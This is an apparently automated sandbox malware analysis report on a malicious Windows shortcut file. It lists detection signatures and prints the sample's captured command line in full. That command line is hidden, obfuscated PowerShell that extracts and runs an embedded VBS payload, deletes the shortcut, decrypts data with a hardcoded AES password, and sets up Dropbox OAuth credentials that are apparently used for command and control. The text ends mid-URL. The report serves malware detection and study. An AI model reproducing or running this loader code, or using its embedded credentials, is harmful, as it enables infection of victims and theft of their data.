Windows
Analysis Report
11111.lnk
Overview
General Information
Detection
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download payload from hardcoded c2 list
Windows shortcut file (LNK) starts blacklisted processes
Deletes itself after installation
Encrypted powershell cmdline option found
Found URL in windows shortcut file (LNK)
Machine Learning detection for sample
Powershell creates an autostart link
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Suspicious PowerShell IEX Execution Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Very long command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Usage Of Web Request Commands And Cmdlets
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 3192 cmdline: "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\user\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file= New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\user\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length); if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret}; $tokenEndpoint = \"https://api.dropboxapi.com/oaut